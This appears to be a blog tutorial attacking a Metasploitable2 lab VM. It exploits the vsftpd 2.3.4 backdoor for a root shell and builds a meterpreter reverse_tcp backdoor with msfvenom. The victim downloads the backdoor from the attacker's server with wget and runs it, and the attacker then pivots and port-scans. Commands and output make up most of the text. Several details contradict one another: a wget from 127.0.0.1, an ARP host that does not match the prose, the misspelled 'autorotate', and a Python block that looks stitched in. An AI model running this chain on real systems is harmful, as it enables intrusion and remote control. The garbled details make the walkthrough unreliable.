    Next, we can check for matching payloads via the show payloads command to see which payloads are suitable for this particular exploit module. We can see only a single payload, payload/cmd/unix/interact. We select this payload using the set payload cmd/unix/interact command.




    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload payload/cmd/unix/interact
    payload => cmd/unix/interact
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > 
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
    
    [*] 192.168.43.120:21 - Banner: 220 (vsFTPd 2.3.4)
    [*] 192.168.43.120:21 - USER: 331 Please specify the password.
    [+] 192.168.43.120:21 - Backdoor service has been spawned, handling...
    [+] 192.168.43.120:21 - UID: uid=0(root) gid=0(root)
    [*] Found shell.
    [*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.43.120:6200) at 2021-07-10 00:21:53 +0530
    
    whoami
    root
    pwd
    /
    



    Voila! We got root access to the target system. So, what's next? Since we have only a simple shell, let us try gaining better control over the target by spawning a meterpreter shell.


    In order to maintain access and obtain a meterpreter shell, we need to create a client-side payload, upload it to the target system, and execute it. So, let's get started.

     

    sudo msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.43.152 LPORT=4444 -f elf > backdoor.elf

    192.168.43.152 is the IP address of our own (attacking) machine.




    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ ls
    ip.txt  livehosts.txt  osdetails.txt  vapt-report.txt  vuln.txt
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ sudo msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.43.152 LPORT=4444 -f elf > backdoor.elf                 
    [sudo] password for hackerboy: 
    [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
    [-] No arch selected, selecting arch: x86 from the payload
    No encoder specified, outputting raw payload
    Payload size: 123 bytes
    Final size of elf file: 207 bytes
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ ls                             
    backdoor.elf  ip.txt  livehosts.txt  osdetails.txt  vapt-report.txt  vuln.txt
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ 
    
    



    We can use a great utility called msfvenom to generate a meterpreter payload, as shown in the preceding output. The -p switch defines the payload to use, while LHOST and LPORT define our IP address and the port number that the backdoor.elf file will connect back to in order to give us meterpreter access to the target. The -f switch defines the output format; elf is the native executable format of Linux-based systems.

     

    But what happens next? Do we walk over to the victim's system and run the post-exploitation there? No, nothing like that: we will obtain the meterpreter shell through the existing exploit session, and we will deliver the payload to the victim's system from an Apache server running on our own machine.

     

    If the victim is on another network, i.e. not directly reachable from your machine, you could host the file on a rented server and download it from there onto the target machine.



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ sudo service apache2 start                                                                              
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ sudo mv backdoor.elf /var/www/html/                                                                                      
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ 
    



    We run the apache service via the service apache2 start command and move the backdoor file into the default document root directory of the Apache server. Let us now download the file from our Apache server onto the victim system.


    whoami
    root
    pwd
    /
    
    
    wget http://192.168.43.152/backdoor.elf       
    --16:06:29--  http://192.168.43.152/backdoor.elf
               => `backdoor.elf'
    Connecting to 192.168.43.152:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 207
    
        0K                                                       100%    7.65 MB/s
    
    16:06:29 (7.65 MB/s) - `backdoor.elf' saved [207/207]
    
    
    


    We can download the file via the wget command, as shown in the preceding output. Now, in order to allow the victim system to communicate with Metasploit, we need to set up an exploit handler on our system. The handler will allow communication between the target and Metasploit using the same port and payload we used in the backdoor.elf file.



    OR (second method of delivering the backdoor file to the victim machine)

     

    We can also serve the backdoor to the victim's machine with Python's http.server module, like this:


     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[/var/www/html/backdoor]
    └─$ python3 -m http.server 1234                                                                                                   1 ⨯
    Serving HTTP on 0.0.0.0 port 1234 (http://0.0.0.0:1234/) ...
    192.168.43.120 - - [10/Jul/2021 01:36:03] "GET /backdoor.elf HTTP/1.0" 200 - 
     
     

     

    Then, on the victim's machine, we fetch the backdoor file with the wget command:



    whoami
    root
    pwd
    /
    
    wget http://127.0.0.1/backdoor.elf
    
    --2021-07-10 00:47:02--  http://127.0.0.1/backdoor.elf
    Connecting to 127.0.0.1:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 207
    Saving to: ‘backdoor.elf’
    
    backdoor.elf                      100%[===========================================================>]     207  --.-KB/s    in 0s      
    
    2021-07-10 00:47:02 (23.1 MB/s) - ‘backdoor.elf’ saved [207/207]
    
    




    We issue use exploit/multi/handler on a separate terminal in Metasploit and set the payload type as linux/x86/meterpreter/reverse_tcp. Next, we set the listening port via set LPORT 4444 and LHOST as our local IP address. We can now run the module using the exploit command and wait for the incoming connections.



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ sudo msfconsole -q
    This copy of metasploit-framework is more than two weeks old.
     Consider running 'msfupdate' to update to the latest version.
    msf6 > use exploit/multi/handler
    [*] Using configured payload linux/x86/meterpreter/reverse_tcp
    msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
    payload => linux/x86/meterpreter/reverse_tcp
    msf6 exploit(multi/handler) > set LPORT 4444
    LPORT => 4444
    msf6 exploit(multi/handler) > set LHOST 192.168.43.152
    LHOST => 192.168.43.152
    msf6 exploit(multi/handler) > exploit
    
    [*] Started reverse TCP handler on 192.168.43.152:4444 
    ^C[-] Exploit failed [user-interrupt]: Interrupt 
    [-] exploit: Interrupted
    msf6 exploit(multi/handler) > exploit
    
    [*] Started reverse TCP handler...
    
    
    
    

    Once the file is downloaded onto the target, we give it the appropriate permissions via the chmod command, as shown in the following output:



    chmod 777 backdoor.elf
    
    
    
    
    ls -la
    total 129
    drwxr-xr-x  21 root root  4096 Jul  9 16:18 .
    drwxr-xr-x  21 root root  4096 Jul  9 16:18 ..
    -rwxrwxrwx   1 root root   207 Jul  9 16:17 backdoor.elf
    drwxr-xr-x   2 root root  4096 May 13  2012 bin
    drwxr-xr-x   4 root root  1024 May 13  2012 boot
    lrwxrwxrwx   1 root root    11 Apr 28  2010 cdrom -> media/cdrom
    drwxr-xr-x  14 root root 13500 Jul  9 15:53 dev
    drwxr-xr-x  94 root root  4096 Jul  9 16:19 etc
    drwxr-xr-x   7 root root  4096 Jun  2 05:32 home
    ....
    
    
    ./backdoor.elf 
    
    


    Providing the 777 permission will grant all the relevant read, write, and execute permissions on the file. Execute the file, and now switch to the other terminal, which is running our exploit handler:



    msf6 exploit(multi/handler) > exploit
    
    [*] Started reverse TCP handler on 192.168.43.152:4444 
    ^C[-] Exploit failed [user-interrupt]: Interrupt 
    [-] exploit: Interrupted
    msf6 exploit(multi/handler) > exploit
    
    [*] Started reverse TCP handler on 192.168.43.152:4444 
    [*] Sending stage (984904 bytes) to 192.168.43.120
    [*] Meterpreter session 1 opened (192.168.43.152:4444 -> 192.168.43.120:60290) at 2021-07-10 02:49:15 +0530
    
    meterpreter > 
    
    



    Mumma, we got it: we have meterpreter shell access to the target. Let's find some interesting information using the post-exploitation modules:




    meterpreter > sysinfo
    Computer     : metasploitable.localdomain
    OS           : Ubuntu 8.04 (Linux 2.6.24-16-server)
    Architecture : i686
    BuildTuple   : i486-linux-musl
    Meterpreter  : x86/linux
    meterpreter > 
    meterpreter > ifconfig
    
    



    Running the sysinfo command, we can see that the target is metasploitable (an intentionally vulnerable operating system), its architecture is i686, and the kernel version is 2.6.24-16.



    meterpreter > 
    meterpreter > ifconfig
    
    Interface  1
    ============
    Name         : lo
    Hardware MAC : 00:00:00:00:00:00
    MTU          : 16436
    Flags        : UP,LOOPBACK
    IPv4 Address : 127.0.0.1
    IPv4 Netmask : 255.0.0.0
    IPv6 Address : ::1
    IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::
    
    
    Interface  2
    ============
    Name         : eth0
    Hardware MAC : 08:00:27:67:67:30
    MTU          : 1500
    Flags        : UP,BROADCAST,MULTICAST
    IPv4 Address : 192.168.43.120
    IPv4 Netmask : 255.255.255.0
    IPv6 Address : 2409:4064:228d:76cd:a00:27ff:fe67:6730
    IPv6 Netmask : ffff:ffff:ffff:ffff::
    IPv6 Address : fe80::a00:27ff:fe67:6730
    IPv6 Netmask : ffff:ffff:ffff:ffff::
    
    meterpreter > 
    



    Running the ifconfig command on the target, we see some interesting information, such as an additional network interface, which may lead us to the internal network on which the internal systems reside. We run the arp command on the target to check whether any systems are, or recently were, connected to the exploited system from the internal network, as shown in the following output:



    meterpreter > arp
    
    ARP cache
    =========
    
        IP address      MAC address        Interface
        ----------      -----------        ---------
        192.168.43.152  fc:01:7c:29:00:77
    
    meterpreter > 
    
    
    
    

    We can clearly see an additional system with IP address 192.168.43.120 on the internal network. To reach the internal network, we need to set up pivoting on the exploited machine using the autoroute command.



    meterpreter > run autoroute -p
    
    [*] No routes have been added yet 
    meterpreter > 
    
    
    
    meterpreter > run autorotate -s 192.168.43.120 255.255.255.0
    
    [*] Adding a route to 192.168.43.120/255.255.255.0...
    [+] Added route to 192.168.43.120/255.255.255.0 via 192.168.43.120 
    [*] Use the -p option to list all active routes
    
    meterpreter > run autorotate -p
    
    Active Routing Table
    ====================
    
       Subnet            Netmask         Gateway
       ------            -------         -------
       192.168.43.120    255.255.255.0   Session 1 
    
    meterpreter > 
    
    
    


    The autoroute -p command prints all the routing information on a session. We can see we do not have any routes by default. Let us add a route to the target internal network using the autoroute -s 192.168.43.120 255.255.255.0 command. Issuing this command, we can see that the route got successfully added to the routing table, and now all the communication from Metasploit will pass through our meterpreter session to the internal network.

    Let us now put the meterpreter session in the background by using the background command as follows:



    meterpreter > background 
    [*] Backgrounding session 1...
    msf6 exploit(multi/handler) > hosts
    
    Hosts
    =====
    
    address          mac                 name      os_name      os_flavor     os_sp     purpose     info
    comments 
    -------          ---                 ----      ------        -----       ----       -----      ----
     ------
    192.168.43.120   fc:01:7c:29:00:77   metasploitable  Linux                          Server
     
    
    
    msf6 exploit(multi/handler) > 
    




    Since the internal network is now approachable, let us perform a port scan on the 192.168.43.120 system using the auxiliary/scanner/portscan/tcp auxiliary module as follows:



    msf6 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp
    msf6 auxiliary(scanner/portscan/tcp) > show options
    
    Module options (auxiliary/scanner/portscan/tcp):
    
       Name         Current Setting  Required  Description
       ----         ---------------  --------  -----------
       CONCURRENCY  10               yes       The number of concurrent ports to check per host
       DELAY        0                yes       The delay between connections, per thread, in milliseconds
       JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
       PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
       RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       THREADS      1                yes       The number of concurrent threads (max one per host)
       TIMEOUT      1000             yes       The socket connect timeout in milliseconds
    
    msf6 auxiliary(scanner/portscan/tcp) > 
    msf6 auxiliary(scanner/portscan/tcp) > setg RHOSTS 192.168.43.0
    RHOSTS => 192.168.43.0
    msf6 auxiliary(scanner/portscan/tcp) > run
    
    [*] 192.168.43.0:         - Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf6 auxiliary(scanner/portscan/tcp) > 
    msf6 auxiliary(scanner/portscan/tcp) > use auxiliary/scanner/portscan/tcp
    msf6 auxiliary(scanner/portscan/tcp) > setg RHOSTS 192.168.43.120
    RHOSTS => 192.168.43.120
    msf6 auxiliary(scanner/portscan/tcp) > run
    
    [+] 192.168.43.120:       - 192.168.43.120:22 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:23 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:25 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:21 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:53 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:80 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:111 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:139 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:445 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:514 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:513 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:512 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:1099 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:1524 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:2049 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:2121 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:3306 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:3632 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:5432 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:5900 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:6000 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:6200 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:6667 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:6697 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:8009 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:8180 - TCP OPEN
    [+] 192.168.43.120:       - 192.168.43.120:8787 - TCP OPEN
    [*] 192.168.43.120:       - Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf6 auxiliary(scanner/portscan/tcp) > 
    
    
    


    Running the port scan module requires us to set the RHOSTS option to the target's IP address using setg RHOSTS 192.168.43.120. The setg command sets the RHOSTS value globally, so it is carried into every module we load afterwards and we do not have to retype set RHOSTS again and again.

    In order to run this module, we need to issue the run command. We can see from the output that there are multiple services running on the 192.168.43.120 system. Additionally, we can see that port 80 is open. Let us try fingerprinting the service running on port 80 using another auxiliary module, auxiliary/scanner/http/http_version, as follows:



    msf6 auxiliary(scanner/portscan/tcp) > use auxiliary/scanner/http/http_version
    msf6 auxiliary(scanner/http/http_version) > show options
    
    Module options (auxiliary/scanner/http/http_version):
    
       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
       RHOSTS   192.168.43.120   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT    80               yes       The target port (TCP)
       SSL      false            no        Negotiate SSL/TLS for outgoing connections
       THREADS  1                yes       The number of concurrent threads (max one per host)
       VHOST                     no        HTTP server virtual host
    
    msf6 auxiliary(scanner/http/http_version) > set RHOSTS 192.168.43.120
    RHOSTS => 192.168.43.120
    msf6 auxiliary(scanner/http/http_version) > run
    
    [+] 192.168.43.120:80 Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf6 auxiliary(scanner/http/http_version) > 
    
    
    


    Running the auxiliary module, we find that the service on port 80 is the popular Apache 2.2.8 web server, with PHP 5.2.4 behind it. Searching the web, we find that PHP version 5.2.4 is vulnerable and can allow an attacker to gain access to the target system.
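    To make the route and the RHOSTS behaviour seen above concrete (autoroute -s 192.168.43.120 255.255.255.0 covers the whole 192.168.43.0/24 network, yet setg RHOSTS 192.168.43.0 scanned only one host while 192.168.43.0/24 would cover the range), here is an added Python model of the session route table and of RHOSTS expansion. It is an illustration written for this page, not Metasploit's own code, and the function names are assumptions.

```python
import ipaddress
from typing import Dict, List, Optional, Tuple

# Constructed model of the per-session route table that `autoroute -s` builds.
# This is an added illustration, not Metasploit's own code.
ROUTES: List[Tuple[ipaddress.IPv4Network, int]] = []

def add_route(subnet: str, netmask: str, session_id: int) -> ipaddress.IPv4Network:
    """Mirror `autoroute -s <subnet> <netmask>` run inside session <session_id>.

    The host bits are masked off, so 192.168.43.120/255.255.255.0 becomes the
    network 192.168.43.0/24: every address in that network is pivoted.
    """
    net = ipaddress.IPv4Network(f"{subnet}/{netmask}", strict=False)
    ROUTES.append((net, session_id))
    return net

def route_for(target: str) -> Optional[int]:
    """Session a target is sent through, or None when it is reached directly."""
    ip = ipaddress.IPv4Address(target)
    matches = [(net.prefixlen, sid) for net, sid in ROUTES if ip in net]
    return max(matches)[1] if matches else None  # longest prefix wins

def expand_rhosts(spec: str) -> List[str]:
    """Expand one RHOSTS value: a bare address is ONE host, a CIDR is the range.

    Simplified model: Metasploit also accepts dashed ranges and file: lists.
    """
    if "/" in spec:
        return [str(h) for h in ipaddress.IPv4Network(spec, strict=False).hosts()]
    return [spec]

def scan_plan(spec: str) -> Dict[Optional[int], List[str]]:
    """Group the expanded targets by the session each would be pivoted through."""
    plan: Dict[Optional[int], List[str]] = {}
    for host in expand_rhosts(spec):
        plan.setdefault(route_for(host), []).append(host)
    return plan

if __name__ == "__main__":
    add_route("192.168.43.120", "255.255.255.0", 1)
    # `setg RHOSTS 192.168.43.0` scans only the network address itself:
    print(scan_plan("192.168.43.0"))  # {1: ['192.168.43.0']}
    # a CIDR value covers all 254 usable hosts, every one via session 1:
    print({s: len(h) for s, h in scan_plan("192.168.43.0/24").items()})  # {1: 254}
    print(route_for("10.10.10.10"))  # None: no route, so a direct connection
```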


    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. They do not involve any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly advise against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or incite any illegal activity or hacking.



      - Hacking Truth by Kumar Atul Jaiswal


